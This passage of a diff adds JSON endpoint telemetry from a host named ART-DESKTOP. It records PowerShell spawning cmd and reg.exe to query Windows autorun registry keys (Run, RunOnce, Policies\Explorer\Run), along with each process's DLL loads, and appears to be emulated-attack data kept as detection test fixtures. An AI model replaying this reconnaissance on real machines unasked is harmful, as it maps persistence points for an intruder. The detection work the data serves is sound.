"bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "process", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "process", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5500, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571314060000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3824, + "ppid": 5500, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571314150016, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "process", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "process", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6396, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571314320000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1060, + "ppid": 6396, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571314410000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "process", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "process", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2912, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571314599984, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6956, + "ppid": 2912, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571314690000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "process", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "process", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2788, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571314870000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5668, + "ppid": 2788, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001092C95001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "process", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "process", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3496, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571315119984, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "event_type": "image_load", 